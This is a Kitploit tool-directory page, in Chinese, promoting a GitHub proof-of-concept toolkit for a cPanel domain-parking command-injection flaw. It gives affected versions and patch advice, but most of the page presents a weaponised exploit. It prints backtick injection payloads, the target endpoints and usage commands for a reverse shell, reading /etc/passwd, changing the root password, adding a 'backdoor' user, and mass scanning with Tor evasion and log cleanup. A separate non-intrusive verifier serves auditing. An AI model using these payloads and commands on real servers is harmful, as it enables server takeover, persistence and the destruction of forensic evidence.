Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-65643-PoC-Toolkit — 红队/蓝队工具包,针对 CVE-2026-65643——cPanel 域名停放远程代码执行漏洞。包含带反向 Shell 的漏洞利用、Webshell、持久化及批量扫描功能,另附非侵入式验证器,用于检测与审计。 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
权限提升漏洞扫描器持久化机制漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队Payload 开发
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

1天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

红队/蓝队工具包,针对 CVE-2026-65643——cPanel 域名停放远程代码执行漏洞。包含带反向 Shell 的漏洞利用、Webshell、持久化及批量扫描功能,另附非侵入式验证器,用于检测与审计。

查看仓库

CVEPoC

CVE‑2026‑65643 – cPanel 域名停放 RCE 工具包

Python 3.8+ CVSS Author cPanel

⚠️ 仅供道德使用 – 授权安全测试 本仓库提供的工具仅适用于授权安全专业人员、蓝队和渗透测试人员。 未经授权访问计算机系统在 CFAA(美国)、《计算机滥用法》(英国)、TCK 243/244(土耳其)以及全球类似法律下均属违法行为。


📖 漏洞概述

CVE‑2026‑65643 是 cPanel & WHM 11.x 版本中的一个严重命令注入漏洞,允许已认证的 cPanel 用户通过域名停放功能以root 权限执行任意系统命令。

工作原理

  1. 需要已认证访问 – 攻击者必须在目标服务器上拥有有效的 cPanel 账户(用户名/密码)。
  2. 域名停放注入 – 在添加停放域名时,域名未经过适当的清理,攻击者可以使用反引号(`)注入 shell 命令。
  3. 命令执行 – 注入的命令由系统以 cPanel 用户的权限执行,并可通过权限提升技术升级为 root 权限。
  4. Root 权限 – 由于域名停放操作以足够的权限运行,因此可以以高权限执行任意命令。
  5. 影响 – 服务器完全沦陷、数据窃取、后门、勒索软件和横向移动。请立即升级!

受影响版本

  • cPanel & WHM 11.110.0.140 及更早版本 – 存在漏洞
  • 11.134.0.52 及更早版本 – 存在漏洞
  • 11.136.0.36 及更早版本 – 存在漏洞
  • 11.138.0.1 及更早版本 – 存在漏洞
  • 11.138.1.6 及更高版本 – 已修复

补丁

  • 升级至 cPanel & WHM 11.138.1.6、11.138.0.2、11.136.0.37、11.134.0.53 或 11.110.0.141 或更高版本。
  • 如果无法升级,请禁用 cPanel 用户的域名停放权限作为临时缓解措施。

🧰 工具

工具用途目标用户
exploit.py功能完整的武器化工具包,包含反弹 Shell、WebShell、持久化、文件读写、root 密码修改、批量扫描、Tor 支持和 OPSEC 功能。红队 / 授权渗透测试人员
verifier.py非侵入式漏洞检测器,可检测 cPanel 版本、验证注入点并评估风险,无需执行任何恶意载荷。可生成详细报告。蓝队 / 安全审计人员

📊 功能对比


🎯 使用场景摘要


⚙️ 安装

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 参数

exploit.py 参数

verifier.py 参数


💥 使用场景


🧪 端点与注入方式

该利用工具使用以下 cPanel 端点和注入方式:

载荷格式

root@kitploit:~
# 注入载荷格式
test.com`<command>`

# 示例
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ 负责任使用

  • 仅对您拥有或已获得明确书面许可的系统使用这些工具。
  • 未经授权访问是非法且不道德的行为。
  • 作者不对任何滥用行为负责。
  • 请始终遵守您所在国家的法律法规。

本软件仅用于教育目的和授权安全测试。

下载工具
功能exploit.pyverifier.py
漏洞检测✅✅
版本检测(4 个端点)✅✅
命令注入✅❌
反弹 Shell✅❌
WebShell 上传✅❌
持久化(创建 cPanel 用户)✅❌
Root 密码修改✅❌
文件读写✅❌
4 种注入方式(JSON/Form/CGI/API2)✅✅
Tor 支持(匿名性)✅❌
User‑Agent 轮换(OPSEC)✅❌
抖动(OPSEC)✅❌
批量扫描(多线程)✅❌
交互式 Shell✅❌
非侵入式(安全)模式❌✅
时间线日志✅✅
HTML 报告✅❌
JSON 报告✅✅
日志清理(反取证)✅✅
代理支持✅✅
自定义 User‑Agent✅✅
SSL 验证控制✅✅
场景推荐工具
蓝队 – 验证您的 cPanel 安装是否存在漏洞verifier.py
安全审计 – 非侵入式漏洞评估verifier.py
红队 – 授权渗透测试及完整利用exploit.py
漏洞赏金 – 负责任披露测试verifier.py
批量扫描 – 检查多个目标是否存在漏洞exploit.py(仅检测)
事件响应 – 检查系统是否已被入侵verifier.py
参数说明
-t, --target目标 cPanel URL(例如 https://cpanel.example.com:2083)
-l, --target-file包含目标列表的文件(每行一个),用于批量扫描
-u, --usernamecPanel 用户名
-P, --passwordcPanel 密码
-p, --port覆盖 cPanel 端口(默认为 URL 中的端口或 2083)
--threads多目标扫描的线程数(默认:10)
-o, --output将 JSON 报告保存到文件
--html-report将 HTML 报告保存到文件
-v, --verbose详细输出
--proxyHTTP/HTTPS 代理(例如 http://127.0.0.1:8080)
--tor通过 Tor 路由(localhost:9050)
-ua, --user-agent自定义 User‑Agent
--no-keep-alive不保持会话存活
--delay请求之间的延迟(默认:2.0 秒)
--jitter请求之间的随机抖动(0‑1 秒)(默认:0.5)
--max-retries最大重试次数(默认:5)
--ssl-verify验证 SSL 证书
--timeout请求超时(默认:15 秒)
--cmd在目标上执行单条命令
--reverse-shell反弹 Shell IP:PORT
--passwd修改 root 密码
--adduser创建 cPanel 用户(USER DOMAIN PASSWORD)
--read读取文件
--write写入文件(指定路径)
--write-content要写入的内容
--cleanup利用后清理日志和历史记录
-i, --interactive利用后进入交互式 Shell
--domain-suffix停放域名的后缀(默认:exploit.local)
参数说明
-t, --target目标 cPanel URL(例如 https://cpanel.example.com:2083)
-u, --usernamecPanel 用户名
-P, --passwordcPanel 密码
-o, --output将 JSON 报告保存到文件
-v, --verbose详细输出
--proxyHTTP/HTTPS 代理(例如 http://127.0.0.1:8080)
--tor通过 Tor 路由(localhost:9050)
--ssl-verify验证 SSL 证书
--timeout请求超时(默认:15 秒)
--cleanup测试后清理日志
#场景命令
1快速漏洞检查python verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2带报告的详细扫描python verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3反弹 Shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4执行命令python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5读取敏感文件python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6修改 root 密码python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7创建新的 cPanel 用户(持久化)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8利用后进入交互式 Shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9从文件批量扫描python exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10使用代理、Tor 和自定义 User‑Agentpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11利用后清理日志python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
方式端点说明
JSON API/cpsessXXXXX/json-api/domain通过 JSON 载荷进行的主要注入方式
表单数据/cpsessXXXXX/json-api/domain通过表单编码数据进行替代注入
CGI 脚本/cgi-sys/domainpark.cgi传统 CGI 端点注入
API2/cpsessXXXXX/json-api/cpanel传统 API2 注入方式